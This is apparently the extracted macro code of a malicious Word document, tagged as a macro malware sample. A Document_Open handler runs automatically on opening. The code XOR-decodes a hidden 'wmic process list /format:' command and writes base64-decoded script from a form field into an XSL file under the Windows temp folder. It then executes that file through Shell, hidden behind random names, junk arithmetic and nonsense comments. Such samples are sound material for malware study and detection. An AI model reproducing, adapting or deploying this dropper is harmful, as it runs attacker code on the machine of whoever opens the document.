Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub
Attribute VB_Name = "aBxmd6"
Function a30g4(aaLDt, aWO6c)
Dim acyEr As Long
Dim asDAp4
acyEr = 26840 / 440
asDAp4 = 508 - 490
a7cD8 = acyEr / asDAp4
a30g4 = aaLDt Xor aWO6c
End Function
Public Sub ag3N6(asPkL)
Dim awMXi As Long
Dim auZkT As Document
Set auZkT = ActiveDocument
awMXi = auZkT.ActiveWindow.Panes(1).Pages.Count
Dim axSrNq
For axSrNq = 16 To 51
Debug.Print Error(axSrNq)
Next axSrNq
Dim auB8d
For auB8d = 16 To 63
Debug.Print Error(auB8d)
Next auB8d
' Accordance paucity
Set aiQ18H = CreateObject("Scripting.FileSystemObject")
If aM8EN = False Then
aM8EN = True
Else
aM8EN = False
End If
' Jurist fearsome neuter masthead
Dim aqzXc As Long
aqzXc = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Micro councils below grocer
Set agLAc = aiQ18H.CreateTextFile(arCgh1 & aHX0Jn & aM86jw & "p" & "\" & "\axYDPH.xsl", 1)
agLAc.Write asPkL
Dim aRpZx5
aRpZx5 = 26874 / 2
' Computer purblind
agLAc.Close
End Sub
Sub aZRQo(ace2b)
Dim asU0A As Long
asU0A = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
Dim ahiDuU
For ahiDuU = 22 To 51
Debug.Print Error(ahiDuU)
Next ahiDuU
Dim a9lEQ As Long
Dim a4eM1 As Document
Set a4eM1 = ActiveDocument
a9lEQ = a4eM1.ActiveWindow.Panes(1).Pages.Count
' Indicating disclosure bookkeeper abbreviations milliner
Call Interaction.Shell@(ace2b, 2)

Dim akrUC As Long
akrUC = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Kiln
aoT8E4 = Not (aoT8E4)
End Sub
Attribute VB_Name = "aGtksT"
Attribute VB_Name = "aXLBAq"
Public Const arCgh1 As String = "c:\\w"
Public Const aHX0Jn As String = "indow"
Public Const aM86jw As String = "s\\tem"
Function aVTiF(adOCX)

Dim azAIb As Long
azAIb = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
aVTiF = UBound(adOCX)
End Function
Function axXiR(adOCX, aHZDCO)

aU0Cmw = ""
If aHbP0q = False Then
aHbP0q = True
Else
aHbP0q = False
End If
' Wt abilities
For at1UP = 0 To aVTiF(adOCX)
aQNpcO = a30g4(adOCX(at1UP), aHZDCO)
aU0Cmw = aU0Cmw & Chr(aQNpcO)
Next
Dim aWs6Gk As Integer
aWs6Gk = 13405 * 1
' Spelling
axXiR = aU0Cmw
End Function
Attribute VB_Name = "afjvV"
Function aEDWYi()
aEDWYi = Array(247, 237, 233, 227, 160, 240, 242, 239, 227, 229, 243, 243, 160, 236, 233, 243, 244, 160, 175, 230, 239, 242, 237, 225, 244, 186, 162, 227, 186, 220, 247, 233, 238, 228, 239, 247, 243, 220, 244, 229, 237, 240, 220, 225, 248, 217, 196, 208, 200, 174, 248, 243, 236, 162)
End Function
Function aJfZF()

Dim aOBZC As Long
aOBZC = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Construction monetary propitiatory partition
aJfZF = aj4LQg.x.Text
End Function
Sub main()
Dim aWiEfe As Long
With ActiveDocument
aWiEfe = .ActiveWindow.Panes(1).Pages.Count
End With
' Rainfall debonair cossack
Dim aFPC2H As String
aaFNS = 272 - 144
aFPC2H = axXiR(aEDWYi, aaFNS)
Dim amaLI As Long
With ActiveDocument
amaLI = .ActiveWindow.Panes(1).Pages.Count
End With
' Dugout
If abxNLk = False Then
abxNLk = True
Else
abxNLk = False
End If
' Mead celia immigration coordinate
Dim aIpite As String
aIpite = a8JSza(aJfZF())
Dim aTswg As Long
With ActiveDocument
aTswg = .ActiveWindow.Panes(1).Pages.Count
End With
' Ea voyeurweb ruled raid mangrove
ag3N6 aIpite
Call aZRQo(aFPC2H)

If auZIz = False Then
auZIz = True
Else
auZIz = False
End If
' Thirty-three appointments
If aaMOui = False Then
aaMOui = True
Else
aaMOui = False
End If
End Sub
Attribute VB_Name = "aj4LQg"
Attribute VB_Base = "0{0ADD3A24-EFBC-49F8-A3A9-B863A6E41949}{E71AE7B1-1DA5-4E8C-B250-9C38B6219F48}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "apfM82"
Function a8JSza(alKguO As String)
Dim a6pB2 As Integer
Dim aH60W As Integer
a6pB2 = 24 + 47
aH60W = 39
acVpi = a6pB2 * aH60W
' Appropriately macedon urn governmental
Set auRCkA = New MSXML2.DOMDocument

Dim aUt7fE As Long
aUt7fE = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Instrumental pontoon band
Set awB93E = auRCkA.createElement("b64")
awB93E.DataType = "bin.base64"
awB93E.Text = alKguO
a8JSza = StrConv(awB93E.nodeTypedValue, vbUnicode)

End Function


INQUEST-PP=macro
